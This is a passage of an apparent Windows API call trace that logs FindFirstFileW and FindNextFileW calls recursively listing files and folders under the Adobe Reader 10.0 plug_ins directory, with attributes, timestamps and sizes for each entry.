hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.641] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dab5520, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7ec63, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility.api", cAlternateFileName="ACCESS~1.API")) returned 1 [0058.641] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e05720, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82e519e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroForm", cAlternateFileName="")) returned 1 [0058.642] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e05720, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82e519e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.642] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e05720, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82e519e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.642] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e05720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb36f, dwReserved0=0x0, dwReserved1=0x0, cFileName="adobepdf.xdc", cAlternateFileName="")) returned 1 [0058.642] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e519e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PMP", cAlternateFileName="")) returned 1 [0058.643] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e519e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.644] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e519e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.644] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1aa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobePDF417.pmp", cAlternateFileName="ADOBEP~1.PMP")) returned 1 [0058.644] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e519e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7f400, dwReserved0=0x0, dwReserved1=0x0, cFileName="DataMatrix.pmp", cAlternateFileName="DATAMA~1.PMP")) returned 1 [0058.644] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e77b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="QRCode.pmp", cAlternateFileName="")) returned 1 [0058.644] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e77b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="QRCode.pmp", cAlternateFileName="")) returned 0 [0058.644] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.644] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e519e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ff4900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ff4900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PMP", cAlternateFileName="")) returned 0 [0058.645] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.645] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8308ce80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xae8a63, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroForm.api", cAlternateFileName="")) returned 1 [0058.645] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82e2b880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x217e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroSign.prc", cAlternateFileName="")) returned 1 [0058.645] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f804400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f804400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annotations", cAlternateFileName="ANNOTA~1")) returned 1 [0058.645] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f804400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f804400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.647] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f804400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f804400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.647] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stamps", cAlternateFileName="")) returned 1 [0058.647] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.651] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.651] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81eb2980, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAT", cAlternateFileName="")) returned 1 [0058.651] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81eb2980, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa80 [0058.668] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81eb2980, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81eb2980, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.668] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xcdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.668] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x892d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Faces.pdf", cAlternateFileName="")) returned 1 [0058.669] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc084, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pointers.pdf", cAlternateFileName="")) returned 1 [0058.669] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8c96, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.669] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2eb9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Standard.pdf", cAlternateFileName="")) returned 1 [0058.669] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.669] FindNextFileW (in: hFindFile=0x69aa80, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.670] FindClose (in: hFindFile=0x69aa80 | out: hFindFile=0x69aa80) returned 1 [0058.671] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHS", cAlternateFileName="")) returned 1 [0058.671] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13e0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xaf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hanko.pdf", cAlternateFileName="")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc0af, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x217ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x217ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.687] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.687] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHT", cAlternateFileName="")) returned 1 [0058.687] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff4e760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x132cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb7c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hanko.pdf", cAlternateFileName="")) returned 1 [0058.689] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff4e760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1182b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", 